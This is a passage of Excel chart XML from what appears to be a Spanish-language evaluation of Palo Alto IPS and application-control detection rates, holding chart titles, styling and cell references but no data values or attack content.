                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% DETECCIÓN PROMEDIO FLUJOS DETECTADOS - PA</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:view3D>
      <c:rotX val="50"/>
      <c:perspective val="0"/>
    </c:view3D>
    <c:plotArea>
      <c:layout/>
      <c:doughnutChart>
        <c:varyColors val="1"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:dPt>
            <c:idx val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="1"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="EA4335"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dLbls>
            <c:showLegendKey val="0"/>
            <c:showVal val="0"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
            <c:showLeaderLines val="1"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados III -'!$B$35:$B$36</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados III -'!$C$35:$C$36</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:holeSize val="50"/>
      </c:doughnutChart>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0" sz="1800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart70.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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>FP Automático VS Manual PA por Táctica</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:v>FPs Automáticos</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados III -'!$DD$9:$DD$22</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados III -'!$DO$9:$DO$22</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:v>FPs Manual</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados III -'!$DD$9:$DD$22</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados III -'!$DI$9:$DI$22</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="44951788"/>
        <c:axId val="301801855"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="44951788"/>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301801855"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="301801855"/>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44951788"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="t"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart7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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% Promedio Flujos TP Detectados LV1 IPS y APP-CTRL</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados III -'!$EF$12</c:f>
            </c:strRef>
          </c:tx>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados II - '!$EC$13:$EC$26</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados III -'!$EF$13:$EF$26</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados III -'!$EG$12</c:f>
            </c:strRef>
          </c:tx>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados II - '!$EC$13:$EC$26</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados III -'!$EG$13:$EG$26</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="977839262"/>
        <c:axId val="524477407"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="977839262"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>
        <c:title>
          <c:tx>
            <c:rich>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:defRPr>
                </a:pPr>
                <a:r>
                  <a:rPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>Táctica / Concepto</a:t>
                </a:r>
              </a:p>
            </c:rich>
          </c:tx>
          <c:overlay val="0"/>
        </c:title>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="none"/>
        <c:minorTickMark val="none"/>
        <c:spPr/>
        <c:txPr>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </c:txPr>
        <c:crossAx val="524477407"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="524477407"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="l"/>
        <c:tickLblPos val="nextTo"/>
        <c:spPr>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </c:spPr>
        <c:crossAx val="977839262"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart7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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% Promedio Flujos TP Detectados LV2 IPS y APP-CTRL</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados III -'!$EH$12</c:f>
            </c:strRef>
          </c:tx>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados II - '!$EC$13:$EC$26</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados III -'!$EH$13:$EH$26</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados III -'!$EI$12</c:f>
            </c:strRef>
          </c:tx>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados II - '!$EC$13:$EC$26</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados III -'!$EI$13:$EI$26</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="1381263258"/>
        <c:axId val="1795077928"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="1381263258"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>
        <c:title>
          <c:tx>
            <c:rich>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:defRPr>
                </a:pPr>
                <a:r>
                  <a:rPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>Táctica / Concepto</a:t>
                </a:r>
              </a:p>
            </c:rich>
          </c:tx>
          <c:overlay val="0"/>
        </c:title>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="none"/>
        <c:minorTickMark val="none"/>
        <c:spPr/>
        <c:txPr>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </c:txPr>
        <c:crossAx val="1795077928"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="1795077928"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="l"/>
        <c:tickLblPos val="nextTo"/>
        <c:spPr>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </c:spPr>
        <c:crossAx val="1381263258"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:layout>
        <c:manualLayout>
          <c:xMode val="edge"/>
          <c:yMode val="edge"/>
          <c:x val="0.1876223509339081"/>
          <c:y val="0.15727048675292668"/>
        </c:manualLayout>
      </c:layout>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart7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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% DETECCIÓN DE ATAQUES (IPS + APP-CTRL)</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:view3D>
      <c:rotX val="50"/>
      <c:perspective val="0"/>
    </c:view3D>
    <c:plotArea>
      <c:layout/>
      <c:pie3DChart>
        <c:varyColors val="1"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:dPt>
            <c:idx val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="4285F4"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="1"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="EA4335"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dLbls>
            <c:showLegendKey val="0"/>
            <c:showVal val="0"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
            <c:showLeaderLines val="1"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados III -'!$EE$84:$EE$85</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados III -'!$EF$84:$EF$85</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
      </c:pie3DChart>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0" sz="2000">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart74.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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% TIPOS DE DETECCIÓN &lt;100%</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:view3D>
      <c:rotX val="50"/>
      <c:perspective val="0"/>
    </c:view3D>
    <c:plotArea>
      <c:layout/>
      <c:pie3DChart>
        <c:varyColors val="1"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:dPt>
            <c:idx val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="4285F4"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="1"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="EA4335"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="2"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="FBBC04"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dLbls>
            <c:showLegendKey val="0"/>
            <c:showVal val="0"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
            <c:showLeaderLines val="1"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados III -'!$EE$89:$EE$91</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados III -'!$EF$89:$EF$91</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
      </c:pie3DChart>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="1" sz="1800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart75.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1F1F1F"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="1F1F1F"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>DENSIDAD DE ALERTAS - PALOALTO</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:layout>
        <c:manualLayout>
          <c:xMode val="edge"/>
          <c:yMode val="edge"/>
          <c:x val="0.027583333333333335"/>
          <c:y val="0.05"/>
        </c:manualLayout>
      </c:layout>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados III -'!$DU$8</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="E06666"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:dPt>
            <c:idx val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="CC0000"/>
              </a:solidFill>
              <a:ln cmpd="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:ln>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="1"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="CC0000"/>
              </a:solidFill>
              <a:ln cmpd="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:ln>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="11"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="990000"/>
              </a:solidFill>
              <a:ln cmpd="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:ln>
            </c:spPr>
          </c:dPt>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados III -'!$DT$9:$DT$22</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados III -'!$DU$9:$DU$22</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="707435771"/>
        <c:axId val="1890561130"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="707435771"/>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1890561130"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="1890561130"/>
        <c:scaling>
          <c:orientation val="minMax"/>
          <c:max val="22.0"/>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TOTAL ALERTAS</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707435771"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart76.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chemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>EFECTIVIDAD DE ALERTAS - PALOALTO</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados III -'!$DX$8</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent4"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados III -'!$DT$9:$DT$22</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados III -'!$DX$9:$DX$22</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="429256095"/>
        <c:axId val="2077830474"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="429256095"/>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2077830474"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="2077830474"/>
        <c:scaling>
          <c:orientation val="minMax"/>
          <c:max val="1.0"/>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TOTAL ALERTAS</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429256095"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart77.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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% DETECCIÓN EFICAZ ATAQUES (SÓLO TP)</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:view3D>
      <c:rotX val="50"/>
      <c:perspective val="0"/>
    </c:view3D>
    <c:plotArea>
      <c:layout/>
      <c:pie3DChart>
        <c:varyColors val="1"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:dPt>
            <c:idx val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="F1C232"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="1"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="EA4335"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dLbls>
            <c:showLegendKey val="0"/>
            <c:showVal val="0"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
            <c:showLeaderLines val="1"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados III -'!$ER$27:$ER$28</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados III -'!$EU$27:$EU$28</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
      </c:pie3DChart>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0" sz="1800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart78.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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% DETECCIÓN EFICAZ ATAQUES (SÓLO TP) / TÁCTICA</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados III -'!$EU$9:$EU$10</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="F1C232"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados III -'!$ER$11:$ER$25</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados III -'!$EU$11:$EU$25</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="79908989"/>
        <c:axId val="541860093"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="79908989"/>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541860093"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="541860093"/>
        <c:scaling>
          <c:orientation val="minMax"/>
          <c:max val="1.02"/>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Casos</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79908989"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart79.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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% DETECCIÓN EFICAZ FLUJOS/ATAQUES (TP + COLATERAL)</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="38761D"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:dLbls>
            <c:numFmt formatCode="General" sourceLinked="1"/>
            <c:txPr>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr/>
                </a:pPr>
              </a:p>
            </c:txPr>
            <c:showLegendKey val="0"/>
            <c:showVal val="1"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados III -'!$EZ$11:$EZ$15</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados III -'!$FA$11:$FA$15</c:f>
              <c:numCache/>
